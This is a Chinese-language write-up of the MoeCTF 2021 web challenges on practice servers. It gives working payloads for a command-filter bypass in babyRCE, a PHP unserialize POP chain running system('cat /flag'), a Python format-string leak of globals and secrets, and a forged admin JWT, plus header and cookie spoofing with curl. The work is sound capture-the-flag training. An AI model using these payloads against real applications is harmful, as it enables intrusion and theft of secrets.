MoeCTF_2021web方向WP

fakegame

先尝试随便输入一些数，但是都是失败，bp抓包看一下

发现传递数据的方式是这样的，就可能是js中的原型链污染
稍微解释一下这个是什么：js中的对象有示例，比如我现在有一个Dog对象，然后我实例创建了一个dog
在每个实例对象中会有一个私有的属性__proto__,这个属性指向它的原型，这个原型可以是动物对象，Dog对象继承了一些原型的属性
比如eat，sleep，这样子比如我创建一个新的对象Cat，Cat的原型也是动物，这样eat，sleep这些属性就继承就好，不用再重复写
在这道题中发现参数传递的方式是js的形式，所以考虑修改原型，因为限制只是针对勇者这个对象的，我们修改原型之后让勇者继承

这里我们先修改一些__proto__这个属性，然后发包，发现返回的还是失败，为什么呢？
因为原型这个东西是对象刚被创建或者没有赋值的时候才会被对象继承的，我们抓包的时候，第一个勇者对象的生命，攻击这些已经被我们赋值了
然后修改了原型的属性，当我们再次发包的时候，因为原型已经被修改了，所以创建的第二个勇者就继承了我们修改了的原型属性
变成了开挂勇者，一刀砍死了巨龙，拿到flag

Web 安全入门指北 —POST

环境坏的，做不了
但是看这个题目，估计原题也只要发一个post请求就能解决

Web 安全入门指北 —GET

题目：

<?php
include "flag.php";
$moe = $_GET['moe'];
if ($moe == "flag") {
    echo $flag;
}else {
    highlight_file(__FILE__);
}

http://node5.anna.nssctf.cn:21557/?moe=flag

Web 安全入门指北 — 小饼干

这里就是要找关于VIP的东西，可以用bp抓包，我这里直接用curl解决了，加强一下命令使用

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://node5.anna.nssctf.cn:21254/ -v                                                  
* Host node5.anna.nssctf.cn:21254 was resolved.
* IPv6: (none)
* IPv4: 118.195.175.220
*   Trying 118.195.175.220:21254...
* Connected to node5.anna.nssctf.cn (118.195.175.220) port 21254
* using HTTP/1.x
> GET / HTTP/1.1
> Host: node5.anna.nssctf.cn:21254
> User-Agent: curl/8.11.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sat, 22 Feb 2025 14:45:41 GMT
< Server: Apache/2.4.38 (Debian)
< X-Powered-By: PHP/7.2.34
< Set-Cookie: VIP=0
< Content-Length: 40
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host node5.anna.nssctf.cn left intact
You are not VIP,I will give flag to VIP! 

┌──(root㉿kakeru)-[~/tmp]
└─# curl -H "Cookie: VIP=1" http://node5.anna.nssctf.cn:21254/ 
NSSCTF{c874ce7b-4d2b-4f74-a57a-19bebdc129dd}   

2048

一个2048的游戏界面,随便按键，最后提示要达到50000分
查看页面源代码，这里有这个游戏的源码，然后ctrl+f搜索flag有关的

发现这里计算分数用的是get请求，在flag.php界面
所以访问http://node5.anna.nssctf.cn:22813/flag.php?score=50001就能拿到flag

babyRCE

题目：

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

这里会执行$rce的内容，但是过滤了很多函数
先用ls看看所有的文件

这题中没有过滤\
在linux中命令中间有分隔符，单引号双引号反斜杠反引号也可以照样执行命令比如l''s l""s l\s l``s 所以用这种方式绕过，空格用$IFS`绕过,最后在源码中看到flag

Do you know HTTP

题目描述：检查一下你的学习成果吧
仅仅学习了 HTTP 请求头相关内容，你可能会发现浏览器已经不足以让你便利的去解决问题了，试试 burpsuite！
用bp抓包根据原始页面的提示，把GET请求方法改成HS

再加上X-Forwarded-For: 127.0.0.1
而且这里每次都要重新发包，放到repeater模块不行,但是修改xff之后还是没反应，我就直接curl更改请求做了

┌──(root㉿kakeru)-[~/tmp]
└─# curl -X HS -H 'X-Forwarded-For: 127.0.0.1' http://node5.anna.nssctf.cn:28687/ -v
* Host node5.anna.nssctf.cn:28687 was resolved.
* IPv6: (none)
* IPv4: 118.195.175.220
*   Trying 118.195.175.220:28687...
* Connected to node5.anna.nssctf.cn (118.195.175.220) port 28687
* using HTTP/1.x
> HS / HTTP/1.1
> Host: node5.anna.nssctf.cn:28687
> User-Agent: curl/8.11.1
> Accept: */*
> X-Forwarded-For: 127.0.0.1
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sat, 22 Feb 2025 15:54:59 GMT
< Server: Apache/2.4.38 (Debian)
< X-Powered-By: PHP/7.2.34
< Content-Length: 47
< Content-Type: text/html; charset=UTF-8
< 
我希望你是从'www.ltyyds.com'过来的！
* Connection #0 to host node5.anna.nssctf.cn left intact

从哪里来就是要修改Referer

┌──(root㉿kakeru)-[~/tmp]
└─# curl -X HS -H 'X-Forwarded-For: 127.0.0.1' -H 'Referer: www.ltyyds.com' http://node5.anna.nssctf.cn:28687/ -v
* Host node5.anna.nssctf.cn:28687 was resolved.
* IPv6: (none)
* IPv4: 118.195.175.220
*   Trying 118.195.175.220:28687...
* Connected to node5.anna.nssctf.cn (118.195.175.220) port 28687
* using HTTP/1.x
> HS / HTTP/1.1
> Host: node5.anna.nssctf.cn:28687
> User-Agent: curl/8.11.1
> Accept: */*
> X-Forwarded-For: 127.0.0.1
> Referer: www.ltyyds.com
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sat, 22 Feb 2025 15:56:50 GMT
< Server: Apache/2.4.38 (Debian)
< X-Powered-By: PHP/7.2.34
< Vary: Accept-Encoding
< Content-Length: 85
< Content-Type: text/html; charset=UTF-8
< 
'LT'才是本题官方浏览器哦！
想要得到flag，就用官方浏览器吧！
* Connection #0 to host node5.anna.nssctf.cn left intact

指定浏览器就是修改UA头

┌──(root㉿kakeru)-[~/tmp]
└─# curl -X HS -H 'X-Forwarded-For: 127.0.0.1' -H 'Referer: www.ltyyds.com' -H 'User-Agent: LT' http://node5.anna.nssctf.cn:28687/ -v
* Host node5.anna.nssctf.cn:28687 was resolved.
* IPv6: (none)
* IPv4: 118.195.175.220
*   Trying 118.195.175.220:28687...
* Connected to node5.anna.nssctf.cn (118.195.175.220) port 28687
* using HTTP/1.x
> HS / HTTP/1.1
> Host: node5.anna.nssctf.cn:28687
> Accept: */*
> X-Forwarded-For: 127.0.0.1
> Referer: www.ltyyds.com
> User-Agent: LT
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sat, 22 Feb 2025 15:57:44 GMT
< Server: Apache/2.4.38 (Debian)
< X-Powered-By: PHP/7.2.34
< Content-Length: 44
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host node5.anna.nssctf.cn left intact
NSSCTF{f20b6126-a90b-42dd-b586-fab1854476ae}     

unserialize

题目

<?php

class entrance
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    function __destruct()
    {
        $this->start->helloworld();
    }
}

class springboard
{
    public $middle;

    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}

class evil
{
    public $end;

    function __construct($end)
    {
        $this->end = $end;
    }

    function __get($Attribute)
    {
        eval($this->end);
    }
}

if(isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
}

这里要找pop链
最后我们想要用的是evil类中的__get函数的eval，$this->end就是我们要执行的命令
当你试图访问一个不存在或不可访问（如 private）的属性时，__get() 方法会被自动调用。
能够出发这个__get函数是springboard 中的__call函数，这里执行会echo $this->middle->hs;1
就让这里echo一个evil不存在的属性就能触发
__call怎么触发在 PHP 中，__call() 是一个 魔法方法，当调用未定义或不可访问（如 private）的方法时，它会被自动触发。
所以用entrance类中的$this->start->helloworld(); 让$this -> start 为springboard这样就能访问一个不存在的方法
payload:

<?php
class entrance
{
    public $start;
}
class springboard
{
    public $middle;
}
class evil
{
    public $end;

}

$a = new entrance();
$b = new springboard();
$c = new evil();
$a -> start = $b;
$b -> middle = $c;
$c -> end = "system('cat /flag');";

echo serialize($a);
?>

O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system('cat /flag');";}}}

地狱通讯

题目

from flask import Flask, render_template, request
from flag import flag, FLAG
import datetime

app = Flask(__name__)


@app.route("/", methods=['GET', 'POST'])
def index():
    f = open("app.py", "r")
    ctx = f.read()
    f.close()
    f1ag = request.args.get('f1ag') or ""
    exp = request.args.get('exp') or ""
    flAg = FLAG(f1ag)
    message = "Your flag is {0}" + exp
    if exp == "":
        return ctx
    else:
        return message.format(flAg)


if __name__ == "__main__":
    app.run()

这个是用python的flask构造一个web界面的源码
f1ag和exp都是通过get请求传递，这里最后返回的时候用format把flAg放在message中的{0}位置
所以如果exp中也有{0}就可以访问到FLAG
在python中
class 获取对象的类。
init 获取类的构造方法。
globals 获取该类定义时的全局变量。
payload为?flag=1&exp={0.__class__.__init__.__globals__}

Your flag is {'__name__': 'flag', '__doc__': None, '__package__': '', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fc8364bbb10>, '__spec__': ModuleSpec(name='flag', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fc8364bbb10>, origin='/var/www/html/flag.py'), '__file__': '/var/www/html/flag.py', '__cached__': '/var/www/html/__pycache__/flag.cpython-311.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=, origin='built-in'), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': , 'getattr': , 'globals': , 'hasattr': , 'hash': , 'hex': , 'id': , 'input': , 'isinstance': , 'issubclass': , 'iter': , 'aiter': , 'len': , 'locals': , 'max': , 'min': , 'next': , 'anext': , 'oct': , 'ord': , 'pow': , 'print': , 'repr': , 'round': , 'setattr': , 'sorted': , 'sum': , 'vars': , 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': , 'memoryview': , 'bytearray': , 'bytes': , 'classmethod': , 'complex': , 'dict': , 'enumerate': , 'filter': , 'float': , 'frozenset': , 'property': , 'int': , 'list': , 'map': , 'object': , 'range': , 'reversed': , 'set': , 'slice': , 'staticmethod': , 'str': , 'super': , 'tuple': , 'type': , 'zip': , '__debug__': True, 'BaseException': , 'BaseExceptionGroup': , 'Exception': , 'GeneratorExit': , 'KeyboardInterrupt': , 'SystemExit': , 'ArithmeticError': , 'AssertionError': , 'AttributeError': , 'BufferError': , 'EOFError': , 'ImportError': , 'LookupError': , 'MemoryError': , 'NameError': , 'OSError': , 'ReferenceError': , 'RuntimeError': , 'StopAsyncIteration': , 'StopIteration': , 'SyntaxError': , 'SystemError': , 'TypeError': , 'ValueError': , 'Warning': , 'FloatingPointError': , 'OverflowError': , 'ZeroDivisionError': , 'BytesWarning': , 'DeprecationWarning': , 'EncodingWarning': , 'FutureWarning': , 'ImportWarning': , 'PendingDeprecationWarning': , 'ResourceWarning': , 'RuntimeWarning': , 'SyntaxWarning': , 'UnicodeWarning': , 'UserWarning': , 'BlockingIOError': , 'ChildProcessError': , 'ConnectionError': , 'FileExistsError': , 'FileNotFoundError': , 'InterruptedError': , 'IsADirectoryError': , 'NotADirectoryError': , 'PermissionError': , 'ProcessLookupError': , 'TimeoutError': , 'IndentationError': , 'IndexError': , 'KeyError': , 'ModuleNotFoundError': , 'NotImplementedError': , 'RecursionError': , 'UnboundLocalError': , 'UnicodeError': , 'BrokenPipeError': , 'ConnectionAbortedError': , 'ConnectionRefusedError': , 'ConnectionResetError': , 'TabError': , 'UnicodeDecodeError': , 'UnicodeEncodeError': , 'UnicodeTranslateError': , 'ExceptionGroup': , 'EnvironmentError': , 'IOError': , 'open': , 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2022 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.}, 'os': , 'flag': 'NSSCTF{d49ac46c-0a9a-4a13-9c83-5a0fa1d8111c}', 'FLAG': }

地狱通讯 - 改

题目：

from flask import Flask, render_template, request, session, redirect, make_response
from secret import secret, headers, User
import datetime
import jwt

app = Flask(__name__)


@app.route("/", methods=['GET', 'POST'])
def index():
    f = open("app.py", "r")
    ctx = f.read()
    f.close()
    res = make_response(ctx)
    name = request.args.get('name') or ''
    if 'admin' in name or name == '':
        return res
    payload = {
        "name": name,
    }
    token = jwt.encode(payload, secret, algorithm='HS256', headers=headers)
    res.set_cookie('token', token)
    return res


@app.route('/hello', methods=['GET', 'POST'])
def hello():
    token = request.cookies.get('token')
    if not token:
        return redirect('/', 302)
    try:
        name = jwt.decode(token, secret, algorithms=['HS256'])['name']
    except jwt.exceptions.InvalidSignatureError as e:
        return "Invalid token"
    if name != "admin":
        user = User(name)
        flag = request.args.get('flag') or ''
        message = "Hello {0}, your flag is" + flag
        return message.format(user)
    else:
        return render_template('flag.html', name=name)


if __name__ == "__main__":
    app.run()

该 Web 应用有两个路由：

/（index()）：
读取 app.py 文件的内容并返回作为 HTTP 响应。
如果用户在 URL 参数 name 中提供了一个值，就生成一个 JWT 令牌（排除 “admin”）。
令牌存储在 token cookie 中。
/hello（hello()）：
检查用户是否携带 token cookie，如果没有，则重定向到 /。
解析 JWT 令牌，提取 name。
如果 name 不是 “admin”，就返回一条个性化的消息。
如果 name 是 “admin”，则渲染 flag.html。
我们先创建一个用户得到token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiaGFjayJ9.qBmUAhskQCDOFXDZfDBtaRmR92EJUo_xLiPa5VfHkKc

然后访问 /hello路由，用这个token作为cookie，然后用上题一样的stti漏洞

得到secret和headers

'secret': 'u_have_kn0w_what_f0rmat_i5', 
'headers': {'alg': 'HS256', 'typ': 'JWT'}, 'User': <class 'secret.User'>}

然后去一个jwt加密网站 http://jwt.io/
这是个签名，我们先把headers修改一下，然后输入secret，最后输入刚才token。因为这样才是认证签名
再把name改成admin

得到

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4ifQ.jlAcmWWxtmNLxbxwfRE45Fxf16dX6LQmrK_1dgx7zmg

再去bp把这个admin的token给cookie